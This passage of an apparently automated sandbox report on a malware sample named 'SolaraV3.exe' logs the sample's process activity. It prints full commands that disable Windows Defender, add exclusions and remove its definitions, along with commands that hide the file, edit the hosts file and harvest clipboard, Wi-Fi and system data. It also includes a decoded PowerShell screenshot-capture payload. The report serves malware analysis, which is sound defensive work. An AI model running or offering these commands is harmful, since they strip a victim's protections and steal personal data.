              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6DC70D12C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6DC70C8A0
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FF6DC70D30C SetUnhandledExceptionFilter,2_2_00007FF6DC70D30C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFB0B815A24
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0C3C0376 SetUnhandledExceptionFilter,2_2_00007FFB0C3C0376
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EED4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,110_2_00007FF74EED4C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EECB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,110_2_00007FF74EECB52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EECB6D8 SetUnhandledExceptionFilter,110_2_00007FF74EECB6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EECA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,110_2_00007FF74EECA66C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA